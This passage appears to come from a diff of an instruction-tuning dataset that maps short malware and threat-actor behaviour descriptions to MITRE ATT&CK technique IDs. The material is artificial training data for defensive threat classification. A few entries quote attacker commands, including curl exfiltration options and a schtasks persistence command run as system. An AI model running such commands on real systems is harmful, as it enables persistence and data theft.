models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Doki has used Ngrok to establish C2 and exfiltrate data.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Honeybee, the threat actors uploaded stolen files to their C2 servers.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dyre has the ability to send information staged on a compromised host externally to C2.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ebury can exfiltrate SSH credentials through custom DNS queries.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FunnyDream can execute commands, including gathering user information, and send the results to C2.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "njRAT has used HTTP to receive stolen information from the infected machine.", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Conficker scans for other machines to infect.", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NBTscan can be used to scan IP networks.", + "output": "- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HELLOKITTY can use WMI to delete volume shadow copies.", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Micropsia searches for anti-virus software and firewall products installed on the victim\u2019s machine using WMI.", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally.", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Bundlore uses the \"\"curl -s -L -o\"\" command to exfiltrate archived data to a URL.\"", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "FrameworkPOS can use DNS tunneling for exfiltration of credit card data.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hydraq connects to a predefined domain on port 443 to exfil gathered information.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kobalos can exfiltrate credentials over the network via UDP.", + "output": "- T1048: Exfiltration Over Alternative Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.", + "output": "- T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.", + "output": "- T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Carbon uses HTTP to send data to the C2 server.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cherry Picker exfiltrates files over FTP.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"CookieMiner has used the \"\"curl --upload-file\"\" command to exfiltrate data over HTTP.\"", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ftp may be used to exfiltrate data separate from the main command and control protocol.", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Babuk can use \u201cWNetOpenEnumW\u201d and \u201cWNetEnumResourceW\u201d to enumerate files in network resources for encryption.", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NETWIRE can capture session logon details from a compromised host.", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Tropic Trooper has tested if the localhost network is available and other connection capability on an infected system using command scripts.", + "output": "- T1049: System Network Connections Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.", + "output": "- T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SPACESHIP copies staged data to removable drives when they are inserted into the system.", + "output": "- T1052.001: Exfiltration Over Physical Medium - Exfiltration over USB" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has used a scheduled task to execute a malicious file.", + "output": "- T1053: Scheduled Task/Job" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Earth Lusca used the command \"\"schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR \u201c[file path]\u201d /ru system\"\" for persistence.\"", + "output": "- T1053: Scheduled Task/Job" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.", + "output": "- T1053.002: Scheduled Task/Job - At" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "at can be used to schedule a task on a system to be executed at a specific date or time.", + "output": "- T1053.002: Scheduled Task/Job - At" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google.", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT41 used a compromised account to create a scheduled task on a system.", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Saint Bot has created a scheduled task named \"\"Maintenance\"\" to establish persistence.\"", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Clambling can inject into the `svchost.exe` process for execution.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HiddenWasp adds itself to the LD_PRELOAD path and sets a series of environment variables.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Honeybee uses a batch file to load a DLL into the svchost.exe process.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "JHUHUGIT performs code injection injecting its own functions to browser processes.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lizar can migrate the loader into another process.", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. 